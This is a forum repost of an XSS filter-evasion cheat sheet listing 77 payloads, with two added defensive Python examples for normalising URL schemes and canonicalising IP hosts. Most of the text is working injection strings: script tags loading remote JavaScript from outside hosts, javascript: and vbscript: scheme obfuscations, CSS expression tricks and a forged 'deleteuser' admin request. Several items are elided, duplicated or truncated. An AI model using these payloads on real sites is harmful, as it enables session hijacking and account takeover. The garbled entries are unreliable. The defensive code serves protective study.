It seems t00ls has relatively little material on XSS; I saw something good and copied it over, not sure whether any of you folks need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (must have semicolons)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically useless domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
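The items from (3) to (19) above all vary how the `javascript:` scheme is written inside an attribute value (mixed case, HTML character references, an embedded tab, newline or carriage return, a NUL byte, leading spaces), and each variant defeats a filter that looks for the literal string `javascript:`. The defender-side counterpart is to normalise the value the way the browser does and then accept only an explicit allow-list of schemes. The following is an added example, not code from the original post or from the cheat sheet it was copied from; the `SAFE_SCHEMES` allow-list and the attribute-extractor regex in `find_unsafe_urls` are assumptions of the example.

```python
"""Detect "javascript:"-style schemes hidden in HTML attribute values.

Added example (not from the original post). Browsers decode character
references and drop ASCII control characters and surrounding whitespace
before they read a URL scheme, so a filter must normalise the same way
and then accept only an explicit allow-list of schemes.
"""
import html
import re
from typing import List, Optional

# C0 controls, DEL and the BOM are ignored by the URL parser when they sit
# inside a scheme, so "jav\tascript:", "java\0script:" and "jav\nascript:"
# all still run. Stripping them here is the conservative choice.
_IGNORED_CHARS = re.compile(r"[\x00-\x1f\x7f\ufeff]")

# Schemes a user-supplied href/src is allowed to use (assumed allow-list).
SAFE_SCHEMES = {"http", "https", "mailto"}

# Demonstration-only attribute extractor so the example can run over raw
# markup; production code should run this check from inside a real HTML
# parser or sanitizer instead of a regex.
_ATTR_URL = re.compile(
    r"\b(?:src|href|lowsrc|dynsrc|background)\s*=\s*"
    r"(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def normalize_url(value: str) -> str:
    """Reduce an attribute value to the form the browser will interpret."""
    # html.unescape handles &#106; &#x6A; &#0000106, references without a
    # trailing semicolon, and named references such as &colon;
    decoded = html.unescape(value)
    # Drop ignored control characters anywhere, then surrounding whitespace
    # (str.strip() also removes NBSP and other Unicode space characters).
    return _IGNORED_CHARS.sub("", decoded).strip()


def extract_scheme(url: str) -> Optional[str]:
    """Lower-cased scheme of url, or None for a relative reference."""
    m = re.match(r"[A-Za-z][A-Za-z0-9+.-]*:", url)
    return m.group(0)[:-1].lower() if m else None


def is_safe_url(value: str) -> bool:
    """True when the normalised value is relative or uses an allowed scheme."""
    scheme = extract_scheme(normalize_url(value))
    if scheme is None:
        return True  # relative or scheme-relative ("//host/") reference
    return scheme in SAFE_SCHEMES


def find_unsafe_urls(markup: str) -> List[str]:
    """Raw src/href-style attribute values in markup that fail is_safe_url."""
    hits = []
    for m in _ATTR_URL.finditer(markup):
        raw = next(g for g in m.groups() if g is not None)
        if not is_safe_url(raw):
            hits.append(raw)
    return hits


if __name__ == "__main__":
    # Constructed sample markup mixing a benign link with disguised schemes.
    sample = (
        '<A HREF="https://example.com/">ok</A>'
        '<IMG SRC=JaVaScRiPt:alert(1)>'
        '<IMG SRC="jav\tascript:alert(1)">'
        '<IMG SRC="&#106;avascript:alert(1)">'
    )
    for hit in find_unsafe_urls(sample):
        print("rejected:", repr(hit))
```

The important design point is the order of operations: decode first, strip second, compare last, and compare against an allow-list rather than a blocklist, so that schemes such as `vbscript:` or `data:` that the blocklist never mentioned are rejected as well.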
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) JavaScript escape filtering
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE approach
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
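Items (68) to (76) are about the host part of a URL rather than its scheme: the same address can be written as a decimal integer, as hex or octal dotted components, in mixed radix with whitespace inside, scheme-relative, without `www`, or with a trailing root dot, and a filter that compares host strings literally misses every form but the plain one. The defender-side counterpart is to canonicalise the host before comparing it with an allow-list or blocklist. The following is an added example, not code from the original post; it reimplements the 1-to-4-component `inet_aton` notation in pure Python so that it behaves identically on every platform, and reading a scheme-relative URL as `https` for host extraction is an assumption of the example.

```python
"""Canonicalise URL hosts before allow-list/blocklist comparison.

Added example (not from the original post). Legacy inet_aton notation lets
the same address be written as 3232235521, 0xc0.0xa8.0x00.0x01,
0300.0250.0000.0001 or 192.168.0.1; a check that compares host strings
literally will miss all but the last.
"""
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

# One inet_aton component: 0x-prefixed hex, leading-0 octal, or decimal.
_PART = re.compile(r"^(?:0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _parse_part(part: str) -> Optional[int]:
    """Value of one component, or None if it is not in inet_aton syntax."""
    if not _PART.match(part):
        return None
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of an IPv4 literal in any inet_aton notation.

    Accepts 1 to 4 components; every component but the last must fit in a
    byte and the last one fills the remaining bytes (so "127.1" is
    127.0.0.1). Returns None when host is not such a literal.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *head, last = values
    if any(v > 255 for v in head):
        return None
    remaining = 4 - len(head)
    if last >= 256 ** remaining:
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    number = (number << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(number))


def canonical_host(url: str) -> Optional[str]:
    """Lower-cased host with the trailing root dot removed and IP literals
    rewritten to dotted-quad. A scheme-relative URL ("//host/") is read as
    https for host extraction (assumption of this example)."""
    if url.startswith("//"):
        url = "https:" + url
    host = urlsplit(url).hostname  # already lower-cased by urlsplit
    if host is None:
        return None
    host = host.rstrip(".")
    return canonical_ipv4(host) or host


def is_loopback_or_private(url: str) -> bool:
    """True when the URL's host is an IP literal in a loopback, private or
    link-local range, however it was written. DNS names return False here;
    deciding those requires resolving them first."""
    host = canonical_host(url)
    if host is None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_private or addr.is_link_local


if __name__ == "__main__":
    # Constructed links in the notations listed above.
    for link in ("http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
                 "http://0300.0250.0000.0001/", "http://www.google.com./",
                 "//www.google.com/", "http://2130706433/"):
        print(link, "->", canonical_host(link),
              "internal:", is_loopback_or_private(link))
```

Run once with the mixed-radix host from item (73) stripped of its whitespace, `66.000146.0x7.147` canonicalises to `66.102.7.147`, which is the kind of comparison an allow-list check must be doing before it decides anything about the link.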
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14